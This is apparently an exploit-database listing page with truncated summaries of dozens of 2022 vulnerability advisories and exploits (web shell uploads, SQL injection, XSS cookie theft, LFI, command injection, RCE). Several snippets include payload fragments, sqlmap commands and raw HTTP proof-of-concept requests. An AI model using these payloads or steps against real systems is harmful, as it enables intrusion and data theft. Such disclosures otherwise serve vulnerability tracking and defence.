WordPress Elementor 3.6.2 Remote Code Execution Vulnerability

Description: Insufficient Access Control leading to Subscriber+ Remote Code Execution Affected Plugin: Elementor Plugin Slug: elementor Plugin Developer: Elementor Affected Versions: 3.6.0 – 3.6.2 CVE ID: CVE-2022-1329 CVSS Score: 9.9Critical CVSS Vector:...

Online Car Wash Booking System v1.0 Multiple SQL injection Vulnerability

Title: Online Car Wash Booking System v1.0 Multiple SQLi Author: nu11secur1ty Date: 04.14.2022 Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html Reference:...

Delta Controls enteliTOUCH 3.40.3935 Cross Site Scripting Vulnerability

enteliTouch XSS alertdocument.cookie" / input type="hidden" n...

REDCap Cross Site Scripting Vulnerability

REDCap versions prior to 11.4.0 suffer from a persistent cross site scripting vulnerability that can be leveraged to escalate privileges. Exploit Title: REDCap var target = document.location.host; var csrftoken = csrftoken; var userId = ''; // Replace with your user ID. function privesc var xhr =...

Easy!Appointments < 1.4.3 - Information Disclosure Exploit

!/usr/bin/env ruby Exploit Title: Easy!Appointments 1.4.3 - Unauthenticated PII events disclosure Exploit author: noraj Alexandre ZANNI for ACCEIS https://www.acceis.fr Author website: https://pwn.by/noraj/ Exploit source: https://github.com/Acceis/exploit-CVE-2022-0482 Vendor Homepage:...

Verizon 4G LTE Network Extender 0.4.038.2131 Weak Credential Algorithm Exploit

Verizon's 4G LTE Network Extender is utilizing a weak default admin password generation algorithm. The password is generated using the last 4 values from device's MAC address which is disclosed on the main webUI login page to an unauthenticated attacker. The values are then concatenated with the...

Explore CMS 1.0 SQL Injection Vulnerability

Exploit Title: explore CMS - Boolean Based SQL Injection Exploit Author: Sajibe Kanti Vendor Name : EXPLORE IT Vendor Homepage: https://exploreit.com.bd CVE: On Request POC SQL Injection SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an...

WordPress Anti-Malware Security And Brute-Force Firewall Cross Site Scripting Vulnerability

Tittle: WordPress Plugin Anti-Malware Security and Brute-Force Firewall HTTP/1.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzi...

Windows User Profile Service Privlege Escalation Exploit

The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability in its CreateDirectoryJunction function due to a lack of appropriate checks on the directory structure of the junctions it tries to link together. Attackers can leverage this vulnerability ...

WordPress LayerSlider 7.1.2 Cross Site Scripting Vulnerability

Tittle: WordPress Plugin LayerSlider 5. Exit 6. Save Project 7. XSS will trigger when accessing the project again for example there seem to be other place when its triggered as well, like in the Project's settings POC2 via file,json 1. Add new post & Create Blank Project 2. Import Projects 3. Loa...

Telesquare TLR-2855KS6 - Arbitrary File Deletion Vulnerability

Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Deletion Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: http://www.telesquare.co.kr/ Version: TLR-2855KS6 Tested on: Linux Firefox CVE : CVE-2021-46419 Proof of Concept DELETE /cgi-bin/test.cgi HTTP/1.1 Host: 192.168.1.5...

SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference Vulnerability

Exploit Title: SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference IDOR Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: https://www.sma.de Version: SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R Tested on: Linux Firefox CVE : CVE-2021-46416 Proof of Concept ============ Normal us...

MiniTool Partition Wizard - Unquoted Service Path Vulnerability

Exploit Title: MiniTool Partition Wizard - Unquoted Service Path Exploit Author: Saud Alenazi Vendor Homepage: https://www.minitool.com/ Software Link: https://www.minitool.com/download-center/ Version: 12.0 Tested: Windows 10 Pro x64 es PoC : C:\Users\saudhsc qc MTSchedulerService SC...

Razer Sila - Command Injection Vulnerability

Exploit Title: Razer Sila - Command Injection Exploit Author: Kevin Randall Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila Version: RazerSila-2.0.441api-2.0.418 Tested on: Razer Sila...

Telesquare TLR-2855KS6 - Arbitrary File Creation Vulnerability

Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Creation Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: http://www.telesquare.co.kr/ Version: TLR-2855KS6 Tested on: Linux Firefox CVE : CVE-2021-46418 Proof of Concept PUT /cgi-bin/testingcve.txt HTTP/1.1 Host: 192.168.1.5...

Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion Vulnerability

Exploit Title: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion LFI Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: https://www.franklinfueling.com/ Version: 1.8.19.8580 Tested on: Linux Firefox CVE : CVE-2021-46417 Proof of Concept ============ HT...

Razer Sila - Local File Inclusion Vulnerability

Exploit Title: Razer Sila - Local File Inclusion LFI Exploit Author: Kevin Randall Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila Version: RazerSila-2.0.441api-2.0.418 Tested on: Razer...

WordPress SiteGround Security 1.2.5 Authentication Bypass Vulnerability

WordPress SiteGround Security plugin versions 1.2.5 and below suffer from an authentication bypass vulnerability as well as an authorization weakness in versions 1.2.4 and below. Description: Authentication Bypass via 2-Factor Authentication Setup Affected Plugin: SiteGround Security Plugin Slug:...

Musical World 1 Shell Upload Exploit

Musical-World-Unrestricted-File-Upload-RCE-POC Author: D4rkP0w4r Note Login to client. don't need login to admin Description Upload web shell at UploadedSongs Step to Reproduct Login to user - TRACK - UploadedSongs - Choose File - UPLOAD - access /songs/uploadedsongs/shell.php Exploit When upload...

Movie Seat Reservation System 1.0 File Disclosure / SQL Injection Vulnerabilities

Movie Seat Reservation System Sql Injection Author: D4rkP0w4r Note = exploit don't need login account Exploit Use Burp Suite capture request with payload GET...

Reprise License Manager 14.2 Cross Site Scripting / Information Disclosure Vulnerabilities

Multiple Vulnerabilities in Reprise License Manager 14.2 Credit: Giulia Melotti Garibaldi ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// Product:...

E-Commerce Website 1.0 Shell Upload Exploit

Ecommerce Website Unrestricted File Upload + RCE Author: D4rkP0w4r Note = Create account, don't need login client or admin Description = Create account upload web shell at Customer Image Step to Reproduct Register - upload web shell at Customer Image - clicked Register button Exploit Upload web...

AeroCMS 0.0.1 Shell Upload Exploit

AeroCMS-Unrestricted-File-Upload-POC Author: D4rkP0w4r Description = Upload web shell at Post Image in admin panel Step to Reproduct Login to admin panel - Posts - Add Posts - Post Image - upload malicious file shell.php - access /images/shell.php on url - shell.php page Exploit When upload succe...

Simple House Rental System 1 Shell Upload Exploit

Simple House Rental System Unrestricted File Upload + RCE Author: D4rkP0w4r Note = login to client, don't need login to admin Description = Login to client = Upload web shell at Image Step to Reproduct Login to client - Register - Apartment Registration - Image - Submit Exploit Upload web shell a...

Social Codia SMS 1 Shell Upload Exploit

sms-Unrestricted-File-Upload-RCE-POC Author: D4rkP0w4r Description - Upload web shell at avartar teacher in admin panel Step to Reproduct Login to admin - Teacher - Add Teacher - upload web shell at avartar teacher - Add Teacher Exploit Upload web shell at avartar teacher When upload success acce...

Social Codia SMS 1 Cross Site Scripting Vulnerability

sms-AddStudent-StoredXSS-POC Author: D4rkP0w4r Description = StoredXSS at Add Student Step to Reproduct Login to admin - Students - Add Student - input payload at Enter Name Exploit Input payload at Enter Name - clicked Add Students - access All Student - The XSS will trigger Log out admin and...

PHPGurukul Zoo Management System 1.0 Shell Upload Exploit

Zoo Management System Unrestricted File Upload + RCE Author: D4rkP0w4r Note = don't need register or login account Description= Upload web shell at Upload CV Step to Reproduct Access Vacancies - upload web shell at - Upload CV - APPLY Exploit Upload web shell at Upload CV When upload success acce...

E-Commerce Website 1.1.0 Shell Upload Exploit

Full-Ecommece-Website-Slides-Unrestricted-File-Upload-RCE-POC Author: D4rkP0w4r Description = Upload web shell at Slides in admin panel Step to Reproduct Login to admin - Slides - upload web shell - Submit Exploit Upload web shell at Slides When upload success access...

AeroCMS 0.0.1 Cross Site Scripting Vulnerability

AeroCMS-Comment-StoredXSS-POC Author: D4rkP0w4r Note = Don't need register or login account Description = StoredXSS at comment box Step to Reproduct Click Read More - input payload at Author - click Submit button Exploit Input payload at Author - click Submit button When admin login to admin pane...

Car Rental System 1.0 SQL Injection Vulnerability

Car Rental System SQL Injection Author: D4rkP0w4r Note = Login to customer Injection Point = http://192.168.1.101:8080/CarRental/booking.php?id=1 Exploit Exploit with Sqlmap + Burp Suite Use Burp Suite capture request Then save as sqlicar.txt GET /CarRental/booking.php?id=1 HTTP/1.1 Host:...

PHPGurukul Zoo Management System 1.0 SQL Injection Vulnerability

Zoo Management System SQL Injection Author: D4rkP0w4r Description = sql injection at /animals?classid=1 Injection Point http://192.168.1.101:8080/ZooManagementSystem/publichtml/animals?classid=1 Exploit Exploit with Sqlmap python3 sqlmap.py -u...

FFS Colibri Controller Module 1.8.19.8580 Directory Traversal Vulnerability

============== Author ============== = Name: Momen Eldawakhly Cyber Guy = Company: Cypro.se ====================================== ============== Product ============== = Vendor: Franklin Fueling Systems = Product: FFS Colibri Controller Module = Version: 1.8.19.8580...

Kramer VIAware - Remote Code Execution Exploit

Exploit Title: Remote Code Execution as Root on KRAMER VIAware Exploit Author: sharkmoos Vendor Homepage: https://www.kramerav.com/ Software Link: https://www.kramerav.com/us/product/viaware Version: Tested on: ViaWare Go Linux CVE : CVE-2021-35064, CVE-2021-36356 import sys, urllib3 from request...

ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion Vulnerability

Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery CSRF to Account Deletion Exploit Author: Devansh Bordia Vendor Homepage: https://icehrm.com/ Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS Version: 31.0.0.OS Tested on: Windows 10 CVE: CVE-2022-26588 1. About...

SAP Information System 1.0 Shell Upload Exploit

Title: SAP Information System 1.0 Shell Upload Author: Hejap Zairy Date: 05.04.2022 Vendor: https://www.sourcecodester.com/php/15262/sap-information-system-using-phppdo-oop.html Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/SAPInformationSystem.zip Reference:...

KLiK Social Media Website 1.0 - Multiple SQL injection Vulnerability

Exploit Title: KLiK Social Media Website 1.0 - 'Multiple' SQLi Exploit Author: corpse Vendor Homepage: https://github.com/msaad1999/KLiK-SocialMediaWebsite Software Link: https://github.com/msaad1999/KLiK-SocialMediaWebsite Version: 1.0 Tested on: Debian 11 Parameter: poll GET Type: time-based...

WordPress Loco Translate Plugin < 2.6.1 - Authenticated Stored Cross-Site Scripting Vulnerability

Tittle: WordPress Plugin Loco Translate ' 7. Save 8. Replicated POC2 via example.po 1. Got to Plugin Loco Translate 2. Enter Plugins Options Any Plugin 3. Upload PO options 3. Load example.po Example.po msgid "" msgstr "" "Project-Id-Version: xss-tester\n" "Report-Msgid-Bugs-To: \n"...

Bakery Shop Management System 1.0 Local File Inclusion Vulnerability

Title: Bakery Shop Management System 1.0 LFI To RCE Author: Hejap Zairy Date: 06.04.2022 Vendor: https://www.campcodes.com/projects/php/simple-bakery-shop-management-system/ Software: https://www.campcodes.com/wp-content/uploads/2022/02/bsms0.zip Reference: https://github.com/Matrix07ksa Tested o...

minewebcms 1.15.2 - Cross-site Scripting Vulnerability

Exploit Title: minewebcms 1.15.2 - Cross-site Scripting XSS Google Dork: NA Exploit Author: Chetanya Sharma @AggressiveUser Vendor Homepage: https://mineweb.org/ Software Link: https://github.com/mineweb/minewebcms Version: 1.15.2 Tested on: KALI OS CVE : CVE-2022-1163 --------------- Steps to...

WordPress Hummingbird Plugin < 3.3.2 - Stored Cross-Site Scripting Vulnerability

Tittle: WordPress Plugin Hummingbird Configs edit the "Name and Description" and put the following payload in the Name field: Save and Click 'Apply' to trigger the XSS Go to Hummingbird's Settings Configs and Upload the following config "id": 1, "name": "", "description": "Xss", "config":...

WordPress Ad Inserter Plugin < 2.7.12 - Cross Site Scripting Vulnerability

Tittle: WordPress Plugin Ad Inserter Classification Type XSS OWASP top 10 A7: Cross-Site Scripting XSS CWE-79 wpScan: https://wpscan.com/vulnerability/85582b4f-a40a-4394-9834-0c88c5dc57ba...

Zenario CMS 9.0.54156 - Remote Code Execution (Authenticated) Exploit

Exploit Title: Zenario CMS 9.0.54156 - Remote Code Execution RCE Authenticated Exploit Author: minhnq22 Vendor Homepage: https://zenar.io/ Software Link: https://zenar.io/download-page Version: 9.0.54156 Tested on: Ubuntu 21.04 CVE : CVE-2021–42171 Python3 import os import sys import json import...

School Club Application System v1.0 SQL injection Vulnerability

Title: School Club Application System v1.0 SQLi Author: nu11secur1ty Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html Reference:...

qdPM 9.2 - Cross-site Request Forgery Vulnerability

Exploit Title: qdPM 9.2 - Cross-site Request Forgery CSRF Google Dork: NA Exploit Author: Chetanya Sharma @AggressiveUser Vendor Homepage: https://qdpm.net/ Software Link: https://sourceforge.net/projects/qdpm/files/latest/download Version: 9.2 Tested on: KALI OS CVE : CVE-2022-26180...

Small HTTP Server 3.06 Remote Buffer Overflow Exploit

Exploit Title: Small HTTP Server Remote Buffer Overflow Discovered by: Yehia Elghaly Vendor Homepage: http://smallsrv.com/ Software Link : http://smallsrv.com/shttpsmgi.exe Tested Version: 3.06 Vulnerability Type: Buffer Overflow Remote Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP...

Moodle Pre-Auth Remote Code Execution 0day Exploit

The exploit allow remote code execution, work with default installations and should not require any authentication or user interaction. 0day exploit affecting recent versions of Moodle...

Online Sports Complex Booking System 1.0 SQL Injection Vulnerability

Online Sports Complex Booking System version 1.0 suffers from a remote blind SQL injection vulnerability in Users.php. This is a similar issue as the one discovered by Saud Alenazi in March of 2022 but affects a different file. Title: Online Sports Complex Booking System 1.0 SQL Injection Author:...

Opmon 9.11 - Cross-site Scripting Vulnerability

Exploit Title: Opmon 9.11 - Cross-site Scripting Exploit Author: p3tryx Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time Version: 9.11 Tested on: Chrome, IE and Firefox CVE : CVE-2021-43009 URL POC: alertdocument.cookie; var i=new Image;...

CSZCMS 1.3.0 SSRF / LFI / Remote Code Execution Vulnerabilities

Title: CSZCMS V1.3.0 - SSRF To LFI To Rce Author: Hejap Zairy Vendor: https://sourceforge.net/projects/cszcms/files/install/ Software: https://liquidtelecom.dl.sourceforge.net/project/cszcms/install/CSZCMS-V1.3.0.zip Reference: https://github.com/Matrix07ksa Tested on: Windows, MySQL, Apache 1 -...

binutils 2.37 - Objdump Segmentation Fault Vulnerability

Exploit Title: binutils 2.37 - Objdump Segmentation Fault Exploit Author: p3tryx Vendor Homepage: https://www.gnu.org/software/binutils/ Version: binutils 2.37 Tested on: Ubuntu 18.04 CVE : CVE-2021-43149 Payload file %223"\972\00\0083=Q333A11111111411111333333A $$$\FF$\80 1114...